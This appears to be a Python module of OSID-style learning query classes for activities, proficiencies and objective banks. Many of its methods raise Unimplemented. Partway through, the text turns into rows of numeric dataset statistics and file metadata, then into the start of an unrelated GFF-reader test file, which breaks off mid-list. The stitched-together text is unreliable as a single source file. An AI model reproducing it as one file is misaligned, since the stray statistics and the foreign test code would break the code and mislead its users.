    def get_asset_query(self):
        """Gets the query for an asset.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.repository.AssetQuery) - the asset query
        raise:  Unimplemented - ``supports_asset_query()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_asset_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    asset_query = property(fget=get_asset_query)

    @utilities.arguments_not_none
    def match_any_asset(self, match):
        """Matches an activity that has any asset assigned.
        arg:    match (boolean): ``true`` to match activities with any
                asset, ``false`` to match activities with no asset
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_asset_terms(self):
        """Clears the asset terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    asset_terms = property(fdel=clear_asset_terms)

    @utilities.arguments_not_none
    def match_course_id(self, course_id, match):
        """Sets the course ``Id`` for this query.
        arg:    course_id (osid.id.Id): a course ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``course_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('courseId', str(course_id), match)

    def clear_course_id_terms(self):
        """Clears the course ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('courseId')

    course_id_terms = property(fdel=clear_course_id_terms)

    def supports_course_query(self):
        """Tests if a ``CourseQuery`` is available for querying courses.
        return: (boolean) - ``true`` if a course query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_course_query(self):
        """Gets the query for a course.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.course.CourseQuery) - the course query
        raise:  Unimplemented - ``supports_course_query()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_course_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    course_query = property(fget=get_course_query)

    @utilities.arguments_not_none
    def match_any_course(self, match):
        """Matches an activity that has any course assigned.
        arg:    match (boolean): ``true`` to match activities with any
                courses, ``false`` to match activities with no courses
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_course_terms(self):
        """Clears the course terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    course_terms = property(fdel=clear_course_terms)

    @utilities.arguments_not_none
    def match_assessment_id(self, assessment_id, match):
        """Sets the assessment ``Id`` for this query.
        arg:    assessment_id (osid.id.Id): an assessment ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``assessment_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.match_avatar_id
        self._add_match('assessmentId', str(assessment_id), match)

    def clear_assessment_id_terms(self):
        """Clears the assessment ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('assessmentId')

    assessment_id_terms = property(fdel=clear_assessment_id_terms)

    def supports_assessment_query(self):
        """Tests if an ``AssessmentQuery`` is available for querying assessments.
        return: (boolean) - ``true`` if an assessment query is
                available, ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_assessment_query(self):
        """Gets the query for an assessment.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.assessment.AssessmentQuery) - the assessment query
        raise:  Unimplemented - ``supports_assessment_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_assessment_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    assessment_query = property(fget=get_assessment_query)

    @utilities.arguments_not_none
    def match_any_assessment(self, match):
        """Matches an activity that has any assessment assigned.
        arg:    match (boolean): ``true`` to match activities with any
                assessments, ``false`` to match activities with no
                assessments
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_assessment_terms(self):
        """Clears the assessment terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    assessment_terms = property(fdel=clear_assessment_terms)

    @utilities.arguments_not_none
    def match_objective_bank_id(self, objective_bank_id, match):
        """Sets the objective bank ``Id`` for this query.
        arg:    objective_bank_id (osid.id.Id): an objective bank ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_bank_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.match_bin_id
        self._add_match('assignedObjectiveBankIds', str(objective_bank_id), match)

    def clear_objective_bank_id_terms(self):
        """Clears the objective bank ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
        self._clear_terms('assignedObjectiveBankIds')

    objective_bank_id_terms = property(fdel=clear_objective_bank_id_terms)

    def supports_objective_bank_query(self):
        """Tests if a ``ObjectiveBankQuery`` is available for querying resources.
        return: (boolean) - ``true`` if an objective bank query is
                available, ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_objective_bank_query(self):
        """Gets the query for an objective bank.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.learning.ObjectiveBankQuery) - the objective bank
                query
        raise:  Unimplemented - ``supports_objective_bank_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_objective_bank_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    objective_bank_query = property(fget=get_objective_bank_query)

    def clear_objective_bank_terms(self):
        """Clears the objective bank terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('objectiveBank')

    objective_bank_terms = property(fdel=clear_objective_bank_terms)

    @utilities.arguments_not_none
    def get_activity_query_record(self, activity_record_type):
        """Gets the activity query record corresponding to the given ``Activity`` record ``Type``.
        Multiple retrievals produce a nested ``OR`` term.
        arg:    activity_record_type (osid.type.Type): an activity query
                record type
        return: (osid.learning.records.ActivityQueryRecord) - the
                activity query record
        raise:  NullArgument - ``activity_record_type`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  Unsupported - ``has_record_type(activity_record_type)``
                is ``false``
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()
class ProficiencyQuery(abc_learning_queries.ProficiencyQuery, osid_queries.OsidRelationshipQuery):
    """This is the query for searching proficiencies.
    Each method match specifies an ``AND`` term while multiple
    invocations of the same method produce a nested ``OR``.
    """
    def __init__(self, runtime):
        # Fixed: the generated code left the code-generation template
        # placeholders ('${pkg_name}.${object_name}' and
        # '${object_name_upper}_RECORD_TYPES') unexpanded; use the concrete
        # values, matching the sibling query classes in this module.
        self._namespace = 'learning.Proficiency'
        self._runtime = runtime
        record_type_data_sets = get_registry('PROFICIENCY_RECORD_TYPES', runtime)
        self._all_supported_record_type_data_sets = record_type_data_sets
        self._all_supported_record_type_ids = []
        for data_set in record_type_data_sets:
            self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
        osid_queries.OsidObjectQuery.__init__(self, runtime)

    @utilities.arguments_not_none
    def match_resource_id(self, resource_id, match):
        """Sets the resource ``Id`` for this query.
        arg:    resource_id (osid.id.Id): a resource ``Id``
        arg:    match (boolean): ``true`` if a positive match, ``false``
                for a negative match
        raise:  NullArgument - ``resource_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        if not isinstance(resource_id, Id):
            raise errors.InvalidArgument()
        self._add_match('resourceId', str(resource_id), match)

    def clear_resource_id_terms(self):
        """Clears the resource ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('resourceId')

    resource_id_terms = property(fdel=clear_resource_id_terms)

    def supports_resource_query(self):
        """Tests if a ``ResourceQuery`` is available.
        return: (boolean) - ``true`` if a resource query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_resource_query(self):
        """Gets the query for a resource.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.resource.ResourceQuery) - the resource query
        raise:  Unimplemented - ``supports_resource_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_resource_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    resource_query = property(fget=get_resource_query)

    def clear_resource_terms(self):
        """Clears the resource terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('resource')

    resource_terms = property(fdel=clear_resource_terms)

    @utilities.arguments_not_none
    def match_objective_id(self, objective_id, match):
        """Sets the objective ``Id`` for this query.
        arg:    objective_id (osid.id.Id): an objective ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        if not isinstance(objective_id, Id):
            raise errors.InvalidArgument()
        self._add_match('objectiveId', str(objective_id), match)

    def clear_objective_id_terms(self):
        """Clears the objective ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('objectiveId')

    objective_id_terms = property(fdel=clear_objective_id_terms)

    def supports_objective_query(self):
        """Tests if an ``ObjectiveQuery`` is available for querying objectives.
        return: (boolean) - ``true`` if an objective query is
                available, ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_objective_query(self):
        """Gets the query for an objective.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.learning.ObjectiveQuery) - the objective query
        raise:  Unimplemented - ``supports_objective_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_objective_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    objective_query = property(fget=get_objective_query)

    @utilities.arguments_not_none
    def match_any_objective(self, match):
        """Matches a proficiency that has any objective assigned.
        arg:    match (boolean): ``true`` to match proficiencies with
                any objective, ``false`` to match proficiencies with no
                objective
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_objective_terms(self):
        """Clears the objective terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('objective')

    objective_terms = property(fdel=clear_objective_terms)

    @utilities.arguments_not_none
    def match_completion(self, start, end, match):
        """Sets the completion for this query to match completion percentages between the given range inclusive.
        arg:    start (decimal): start of range
        arg:    end (decimal): end of range
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  InvalidArgument - ``end`` is less than ``start``
        *compliance: mandatory -- This method must be implemented.*
        """
        try:
            start = float(start)
        except ValueError:
            raise errors.InvalidArgument('Invalid start value')
        try:
            end = float(end)
        except ValueError:
            raise errors.InvalidArgument('Invalid end value')
        if match:
            if end < start:
                raise errors.InvalidArgument('end value must be >= start value when match = True')
            self._query_terms['completion'] = {
                '$gte': start,
                '$lte': end
            }
        else:
            raise errors.InvalidArgument('match = False not currently supported')

    def clear_completion_terms(self):
        """Clears the completion terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('completion')

    completion_terms = property(fdel=clear_completion_terms)

    @utilities.arguments_not_none
    def match_minimum_completion(self, completion, match):
        """Sets the minimum completion for this query.
        arg:    completion (decimal): completion percentage
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_minimum_completion_terms(self):
        """Clears the minimum completion terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    minimum_completion_terms = property(fdel=clear_minimum_completion_terms)

    @utilities.arguments_not_none
    def match_level_id(self, grade_id, match):
        """Sets the level grade ``Id`` for this query.
        arg:    grade_id (osid.id.Id): a grade ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``grade_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        if not isinstance(grade_id, Id):
            raise errors.InvalidArgument()
        self._add_match('levelId', str(grade_id), match)

    def clear_level_id_terms(self):
        """Clears all level ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
        self._clear_terms('levelId')

    level_id_terms = property(fdel=clear_level_id_terms)

    def supports_level_query(self):
        """Tests if a ``GradeQuery`` is available.
        return: (boolean) - ``true`` if a grade query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_level_query(self):
        """Gets the query for a grade.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.grading.GradeQuery) - the grade query
        raise:  Unimplemented - ``supports_level_query()`` is ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_level_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    level_query = property(fget=get_level_query)

    @utilities.arguments_not_none
    def match_any_level(self, match):
        """Matches an assessment offered that has any level assigned.
        arg:    match (boolean): ``true`` to match offerings with any
                level, ``false`` to match offerings with no levels
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_level_terms(self):
        """Clears all level terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('level')

    level_terms = property(fdel=clear_level_terms)

    @utilities.arguments_not_none
    def match_objective_bank_id(self, objective_bank_id, match):
        """Sets the objective bank ``Id`` for this query.
        arg:    objective_bank_id (osid.id.Id): an objective bank ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_bank_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.match_bin_id
        self._add_match('assignedObjectiveBankIds', str(objective_bank_id), match)

    def clear_objective_bank_id_terms(self):
        """Clears the objective bank ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
        self._clear_terms('assignedObjectiveBankIds')

    objective_bank_id_terms = property(fdel=clear_objective_bank_id_terms)

    def supports_objective_bank_query(self):
        """Tests if a ``ObjectiveBankQuery`` is available for querying resources.
        return: (boolean) - ``true`` if an objective bank query is
                available, ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_objective_bank_query(self):
        """Gets the query for an objective bank.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.learning.ObjectiveBankQuery) - the objective bank
                query
        raise:  Unimplemented - ``supports_objective_bank_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_objective_bank_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    objective_bank_query = property(fget=get_objective_bank_query)

    def clear_objective_bank_terms(self):
        """Clears the objective bank terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        # Implemented from template for osid.resource.ResourceQuery.clear_group_terms
        self._clear_terms('objectiveBank')

    objective_bank_terms = property(fdel=clear_objective_bank_terms)

    @utilities.arguments_not_none
    def get_proficiency_query_record(self, proficiency_record_type):
        """Gets the proficiency query record corresponding to the given ``Proficiency`` record ``Type``.
        Multiple retrievals produce a nested ``OR`` term.
        arg:    proficiency_record_type (osid.type.Type): a proficiency
                record type
        return: (osid.learning.records.ProficiencyQueryRecord) - the
                proficiency query record
        raise:  NullArgument - ``proficiency_record_type`` is ``null``
        raise:  OperationFailed - unable to complete request
        raise:  Unsupported -
                ``has_record_type(proficiency_record_type)`` is
                ``false``
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()
class ObjectiveBankQuery(abc_learning_queries.ObjectiveBankQuery, osid_queries.OsidCatalogQuery):
    """This is the query for searching objective banks.
    Each method specifies an ``AND`` term while multiple invocations of
    the same method produce a nested ``OR``.
    """
    def __init__(self, runtime):
        self._runtime = runtime
        record_type_data_sets = get_registry('OBJECTIVEBANK_RECORD_TYPES', runtime)
        self._all_supported_record_type_data_sets = record_type_data_sets
        self._all_supported_record_type_ids = []
        for data_set in record_type_data_sets:
            self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
        osid_queries.OsidCatalogQuery.__init__(self, runtime)

    def _get_descendant_catalog_ids(self, catalog_id):
        # Recursively collects the Ids of all catalogs below catalog_id in
        # the objective bank hierarchy.
        hm = self._get_provider_manager('HIERARCHY')
        hts = hm.get_hierarchy_traversal_session_for_hierarchy(
            Id(authority='LEARNING',
               namespace='CATALOG',
               identifier='OBJECTIVEBANK')
        )  # What about the Proxy?
        descendants = []
        if hts.has_children(catalog_id):
            for child_id in hts.get_children(catalog_id):
                descendants += list(self._get_descendant_catalog_ids(child_id))
                descendants.append(child_id)
        return IdList(descendants)

    @utilities.arguments_not_none
    def match_objective_id(self, objective_id, match):
        """Sets the objective ``Id`` for this query.
        arg:    objective_id (osid.id.Id): an objective ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_objective_id_terms(self):
        """Clears the objective ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._clear_terms('objectiveId')

    objective_id_terms = property(fdel=clear_objective_id_terms)

    def supports_objective_query(self):
        """Tests if an ``ObjectiveQuery`` is available.
        return: (boolean) - ``true`` if an objective query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_objective_query(self):
        """Gets the query for an objective.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.learning.ObjectiveQuery) - the objective query
        raise:  Unimplemented - ``supports_objective_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_objective_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    objective_query = property(fget=get_objective_query)

    @utilities.arguments_not_none
    def match_any_objective(self, match):
        """Matches an objective bank that has any objective assigned.
        arg:    match (boolean): ``true`` to match objective banks with
                any objective, ``false`` to match objective banks with
                no objectives
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_objective_terms(self):
        """Clears the objective terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._clear_terms('objective')

    objective_terms = property(fdel=clear_objective_terms)

    @utilities.arguments_not_none
    def match_activity_id(self, activity_id, match):
        """Sets the activity ``Id`` for this query.
        arg:    activity_id (osid.id.Id): an activity ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``activity_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_activity_id_terms(self):
        """Clears the activity ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._clear_terms('activityId')

    activity_id_terms = property(fdel=clear_activity_id_terms)

    def supports_activity_query(self):
        """Tests if a ``ActivityQuery`` is available for querying activities.
        return: (boolean) - ``true`` if an activity query is available,
                ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_activity_query(self):
        """Gets the query for an activity.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.learning.ActivityQuery) - the activity query
        raise:  Unimplemented - ``supports_activity_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_activity_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    activity_query = property(fget=get_activity_query)

    @utilities.arguments_not_none
    def match_any_activity(self, match):
        """Matches an objective bank that has any activity assigned.
        arg:    match (boolean): ``true`` to match objective banks with
                any activity, ``false`` to match objective banks with no
                activities
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_activity_terms(self):
        """Clears the activity terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._clear_terms('activity')

    activity_terms = property(fdel=clear_activity_terms)

    @utilities.arguments_not_none
    def match_ancestor_objective_bank_id(self, objective_bank_id, match):
        """Sets the objective bank ``Id`` for this query to match objective banks that have the specified objective bank as an ancestor.
        arg:    objective_bank_id (osid.id.Id): an objective bank ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_bank_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_ancestor_objective_bank_id_terms(self):
        """Clears the ancestor objective bank ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._clear_terms('ancestorObjectiveBankId')

    ancestor_objective_bank_id_terms = property(fdel=clear_ancestor_objective_bank_id_terms)

    def supports_ancestor_objective_bank_query(self):
        """Tests if a ``ObjectiveBankQuery`` is available for querying ancestor objective banks.
        return: (boolean) - ``true`` if an objective bank query is
                available, ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_ancestor_objective_bank_query(self):
        """Gets the query for an objective bank.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.learning.ObjectiveBankQuery) - the objective bank
                query
        raise:  Unimplemented -
                ``supports_ancestor_objective_bank_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_ancestor_objective_bank_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    ancestor_objective_bank_query = property(fget=get_ancestor_objective_bank_query)

    @utilities.arguments_not_none
    def match_any_ancestor_objective_bank(self, match):
        """Matches an objective bank that has any ancestor.
        arg:    match (boolean): ``true`` to match objective banks with
                any ancestor, ``false`` to match root objective banks
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_ancestor_objective_bank_terms(self):
        """Clears the ancestor objective bank terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._clear_terms('ancestorObjectiveBank')

    ancestor_objective_bank_terms = property(fdel=clear_ancestor_objective_bank_terms)

    @utilities.arguments_not_none
    def match_descendant_objective_bank_id(self, objective_bank_id, match):
        """Sets the objective bank ``Id`` for this query to match objective banks that have the specified objective bank as a descendant.
        arg:    objective_bank_id (osid.id.Id): an objective bank ``Id``
        arg:    match (boolean): ``true`` for a positive match,
                ``false`` for a negative match
        raise:  NullArgument - ``objective_bank_id`` is ``null``
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_descendant_objective_bank_id_terms(self):
        """Clears the descendant objective bank ``Id`` terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._clear_terms('descendantObjectiveBankId')

    descendant_objective_bank_id_terms = property(fdel=clear_descendant_objective_bank_id_terms)

    def supports_descendant_objective_bank_query(self):
        """Tests if a ``ObjectiveBankQuery`` is available for querying descendant objective banks.
        return: (boolean) - ``true`` if an objective bank query is
                available, ``false`` otherwise
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def get_descendant_objective_bank_query(self):
        """Gets the query for an objective bank.
        Multiple retrievals produce a nested ``OR`` term.
        return: (osid.learning.ObjectiveBankQuery) - the objective bank
                query
        raise:  Unimplemented -
                ``supports_descendant_objective_bank_query()`` is
                ``false``
        *compliance: optional -- This method must be implemented if
        ``supports_descendant_objective_bank_query()`` is ``true``.*
        """
        raise errors.Unimplemented()

    descendant_objective_bank_query = property(fget=get_descendant_objective_bank_query)

    @utilities.arguments_not_none
    def match_any_descendant_objective_bank(self, match):
        """Matches an objective bank that has any descendant.
        arg:    match (boolean): ``true`` to match objective banks with
                any descendant, ``false`` to match leaf objective banks
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()

    def clear_descendant_objective_bank_terms(self):
        """Clears the descendant objective bank terms.
        *compliance: mandatory -- This method must be implemented.*
        """
        self._clear_terms('descendantObjectiveBank')

    descendant_objective_bank_terms = property(fdel=clear_descendant_objective_bank_terms)

    @utilities.arguments_not_none
    def get_objective_bank_query_record(self, objective_bank_record_type):
        """Gets the objective bank query record corresponding to the given ``ObjectiveBank`` record ``Type``.
        Multiple record retrievals produce a nested ``OR`` term.
        arg:    objective_bank_record_type (osid.type.Type): an
                objective bank record type
        return: (osid.learning.records.ObjectiveBankQueryRecord) - the
                objective bank query record
        raise:  NullArgument - ``objective_bank_record_type`` is
                ``null``
        raise:  OperationFailed - unable to complete request
        raise:  Unsupported -
                ``has_record_type(objective_bank_record_type)`` is
                ``false``
        *compliance: mandatory -- This method must be implemented.*
        """
        raise errors.Unimplemented()
| 36.748797
| 137
| 0.656937
| 7,595
| 68,757
| 5.742989
| 0.035286
| 0.019533
| 0.045257
| 0.051722
| 0.87324
| 0.833853
| 0.778096
| 0.750676
| 0.725801
| 0.702233
| 0
| 0
| 0.248309
| 68,757
| 1,870
| 138
| 36.768449
| 0.843936
| 0.539843
| 0
| 0.567568
| 0
| 0
| 0.046799
| 0.017618
| 0
| 0
| 0
| 0
| 0
| 1
| 0.303534
| false
| 0
| 0.014553
| 0
| 0.476091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50a58443ccf49cdc106acc0f537a7f5cf6c32d78
| 192
|
py
|
Python
|
src/facet/validation/__init__.py
|
skandupmanyu/facet
|
545ade531ecfa617bad346ebef12955afa876cca
|
[
"Apache-2.0"
] | null | null | null |
src/facet/validation/__init__.py
|
skandupmanyu/facet
|
545ade531ecfa617bad346ebef12955afa876cca
|
[
"Apache-2.0"
] | null | null | null |
src/facet/validation/__init__.py
|
skandupmanyu/facet
|
545ade531ecfa617bad346ebef12955afa876cca
|
[
"Apache-2.0"
] | null | null | null |
"""
Bootstrap cross-validation including a stationary version for use with time series
data; used as the basis to generate confidence intervals for simulations.
"""
from ._validation import *
| 32
| 82
| 0.796875
| 26
| 192
| 5.846154
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.145833
| 192
| 5
| 83
| 38.4
| 0.926829
| 0.8125
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ff51e7c0076afaf18ff11cab246ab5c37beb4e0
| 20,489
|
py
|
Python
|
test/gff_reader_tests.py
|
genomeannotation/GAG
|
997e384e1352d822efb2cb2931a99ec34069d82e
|
[
"MIT"
] | 48
|
2015-08-19T17:52:26.000Z
|
2022-03-29T10:07:03.000Z
|
test/gff_reader_tests.py
|
genomeannotation/GAG
|
997e384e1352d822efb2cb2931a99ec34069d82e
|
[
"MIT"
] | 45
|
2015-01-13T01:56:28.000Z
|
2021-07-01T19:42:16.000Z
|
test/gff_reader_tests.py
|
genomeannotation/GAG
|
997e384e1352d822efb2cb2931a99ec34069d82e
|
[
"MIT"
] | 15
|
2015-07-18T13:16:29.000Z
|
2022-03-14T06:23:20.000Z
|
#!/usr/bin/env python
# coding=utf-8
import io
import os
import unittest
from mock import Mock
from src.gff_reader import *
# noinspection PyPep8
def get_sample_text():
    """Return a well-ordered two-gene GFF sample (tab-separated, one feature per line).

    Gene BDOR_007864 carries exon/CDS/start/stop children; gene BDOR_007866
    adds five_prime_UTR and three_prime_UTR features. Every line keeps its
    trailing newline, matching raw GFF file content.
    """
    # A single join avoids the repeated string-concatenation of the old += chain.
    lines = [
        "scaffold00080\tmaker\tgene\t106151\t109853\t.\t+\t.\tID=BDOR_007864\n",
        "scaffold00080\tmaker\tmRNA\t106151\t109853\t.\t+\t.\tID=BDOR_007864-RA;Parent=BDOR_007864\n",
        "scaffold00080\tmaker\texon\t106151\t106451\t0.9\t+\t.\tID=BDOR_007864-RA:exon:0;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\texon\t106509\t106749\t0.9\t+\t.\tID=BDOR_007864-RA:exon:1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tCDS\t106151\t106451\t.\t+\t0\tID=BDOR_007864-RA:cds:0;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tCDS\t106509\t106749\t.\t+\t2\tID=BDOR_007864-RA:cds:1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tstart_codon\t106151\t106153\t.\t+\t.\tID=BDOR_007864-RA:start1;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tstop_codon\t109851\t109853\t.\t+\t.\tID=BDOR_007864-RA:stop2;Parent=BDOR_007864-RA\n",
        "scaffold00080\tmaker\tgene\t145206\t183302\t.\t+\t.\tID=BDOR_007866\n",
        "scaffold00080\tmaker\tmRNA\t145206\t183302\t.\t+\t.\tID=BDOR_007866-RB;Parent=BDOR_007866\n",
        "scaffold00080\tmaker\texon\t145206\t145282\t0.065333\t+\t.\tID=BDOR_007866-RB:exon:5;Parent=BDOR_007866-RB\n",
        "scaffold00080\tmaker\texon\t145607\t145865\t47.919\t+\t.\tID=BDOR_007866-RB:exon:6;Parent=BDOR_007866-RB\n",
